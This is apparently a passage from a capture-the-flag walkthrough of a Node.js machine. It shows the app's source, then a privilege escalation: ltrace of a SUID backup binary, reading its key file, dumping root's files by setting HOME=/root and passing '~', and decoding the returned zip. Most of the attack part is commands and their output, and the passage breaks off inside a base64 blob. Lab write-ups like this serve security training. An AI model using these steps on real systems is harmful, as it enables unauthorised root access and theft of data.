          'QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ',
          'QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ',
          'QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ',
          'QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ',
          'QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ\'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ',
          'QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ',
          'QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ',
          'QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ',
          'QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ',
          'QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ',
          'QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW',
          'QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ',
          'QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ',
          'QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ',
          'QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ',
          '',
          '',
          '<!-- ' + randomString + ' -->'
        ].join("\n")
      );
    }
  });

  app.use(express.static(path.join(__dirname, 'static')));
  app.use(bodyParser.json());
  app.use(function(err, req, res, next) {
    if (err) {
      res.status(err.status || 500);
      res.send({
        message:"Uh oh, something went wrong!",
        error: true
      });
    }
    else {
      next();
    }
  });

  app.get('/api/users/?', function (req, res) {
    db.collection('users').find().toArray(function (error, docs) {
      if (error) {
        res.status(500).send({ error: true });
      }
      else if (!docs) {
        res.status(404).send({ not_found: true });
      }
      else {
        res.send(docs);
      }
    });
  });

  app.get('/api/users/latest', function (req, res) {
    db.collection('users').find({ is_admin: false }).toArray(function (error, docs) {
      if (error) {
        res.status(500).send({ error: true });
      }
      else if (!docs) {
        res.status(404).send({ not_found: true });
      }
      else {
        res.send(docs);
      }
    });
  });

  app.get('/api/users/:username', function (req, res) {
    db.collection('users').findOne({ username: req.params.username }, function (error, doc) {
      if (error) {
        res.status(500).send({ error: true });
      }
      else if (!doc) {
        res.status(404).send({ not_found: true });
      }
      else {
        res.send(doc);
      }
    });
  });

  app.get('/api/session', function (req, res) {
    if (req.session.user) {
      res.send({
        authenticated: true,
        user: req.session.user
      });
    }
    else {
      res.send({
        authenticated: false
      });
    }
  });

  app.post('/api/session/authenticate', function (req, res) {
    var failureResult = {
      error: true,
      message: 'Authentication failed'
    };

    if (!req.body.username || !req.body.password) {
      res.send(failureResult);
      return;
    }

    db.collection('users').findOne({ username: req.body.username }, function (error, doc) {
      if (error) {
        res.status(500).send({
          message:"Uh oh, something went wrong!",
          error: true
        });

        return;
      }

      if (!doc) {
        res.send(failureResult);
        return;
      }

      var hash = crypto.createHash('sha256');
      var cipherText = hash.update(req.body.password).digest('hex');

      if (cipherText == doc.password) {
        req.session.user = doc;
        res.send({
          success: true
        });
      }
      else {
        res.send({
          success: false
        })
      }
    });
  });

  app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

      proc.on("exit", function(exitCode) {
        res.header("Content-Type", "text/plain");
        res.header("Content-Disposition", "attachment; filename=myplace.backup");
        res.send(backup);
      });

      proc.stdout.on("data", function(chunk) {
        backup += chunk;
      });

      proc.stdout.on("end", function() {
      });
    }
    else {
      res.send({
        authenticated: false
      });
    }
  });

  app.use(function(req, res, next){
    res.sendFile('app.html', { root: __dirname });
  });

  app.listen(3000, function () {
    console.log('MyPlace app listening on port 3000!')
  });

});

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

backup -q testing /root
backup -q /root
backup testing testing /root

---
____________________________________________________
            /                                                    \
           |    _____________________________________________     |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |             Secure Backup v1.0              |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |_____________________________________________|    |
           |                                                      |
            \_____________________________________________________/
                   \_______________________________________/
                _______________________________________________
             _-'    .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.  --- `-_
          _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--.  .-.-.`-_
       _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
    _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
 _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'


 [!] Ah-ah-ah! You didn't say the magic word!

ltrace

  • We can use ltrace to display calls that are made to shared libraries
1

ltrace backup testing testing /root

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

strncpy(0xff8251a8, "testing", 100)              = 0xff8251a8
strcpy(0xff825191, "/")                          = 0xff825191
strcpy(0xff82519d, "/")                          = 0xff82519d
strcpy(0xff825127, "/e")                         = 0xff825127
strcat("/e", "tc")                               = "/etc"
strcat("/etc", "/m")                             = "/etc/m"
strcat("/etc/m", "yp")                           = "/etc/myp"
strcat("/etc/myp", "la")                         = "/etc/mypla"
strcat("/etc/mypla", "ce")                       = "/etc/myplace"
strcat("/etc/myplace", "/k")                     = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                   = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                  = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                  = 0x98ff410
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x98ff410) = 0xff824d3f
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n") = 64
strcmp("testing", "a01a6aa5aaf1d7729f35c8278daae30f"...) = 1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x98ff410) = 0xff824d3f
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n") = 64
strcmp("testing", "45fac180e9eee72f4fd2d9386ea7033e"...) = 1
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x98ff410) = 0xff824d3f
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n") = 64
strcmp("testing", "3de811f4ab2b7543eaf45df611c2dd25"...) = 1
fgets("\n", 1000, 0x98ff410)                     = 0xff824d3f
strcspn("\n", "\n")                              = 0
strcmp("testing", "")                            = 1
fgets(nil, 1000, 0x98ff410)                      = 0
strcpy(0xff823d78, "Ah-ah-ah! You didn't say the mag"...) = 0xff823d78
printf(" %s[!]%s %s\n", "\033[33m", "\033[37m", "Ah-ah-ah! You didn't say the mag"... [!] Ah-ah-ah! You didn't say the magic word!
  • We can navigate into /etc/myplace/keys
  • It is also making a comparison of the key we entered strcmp(“testing”, “a01a6aa5aaf1d7729f35c8278daae30f”…) = 1
1
2
3
4
5
6

cat /etc/myplace/keys
---
	a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508
	45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
	3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110
---

1
2
3

backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 /root  # let's try with the last key
---
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==

1

echo -n "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==" | base64 -d > root.zip

1
2
3
4

unzip root.zip

7z e root.zip # [e] Extract files from archive 
password: magicword

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

cat root.txt

QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ
  • No success
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

ltrace backup dsa testing /tmp

strncpy(0xffc10e98, "testing", 100)                                                   = 0xffc10e98
strcpy(0xffc10e81, "/")                                                               = 0xffc10e81
strcpy(0xffc10e8d, "/")                                                               = 0xffc10e8d
strcpy(0xffc10e17, "/e")                                                              = 0xffc10e17
strcat("/e", "tc")                                                                    = "/etc"
strcat("/etc", "/m")                                                                  = "/etc/m"
strcat("/etc/m", "yp")                                                                = "/etc/myp"
strcat("/etc/myp", "la")                                                              = "/etc/mypla"
strcat("/etc/mypla", "ce")                                                            = "/etc/myplace"
strcat("/etc/myplace", "/k")                                                          = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                                                        = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                                                       = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                                                       = 0x8307410
  • There is no filtering for “~”
  • We can change that variable to /root
1

export HOME=/root

1
2
3

backup test 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
or
backup -q 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"
  • Another base 64
1

echo "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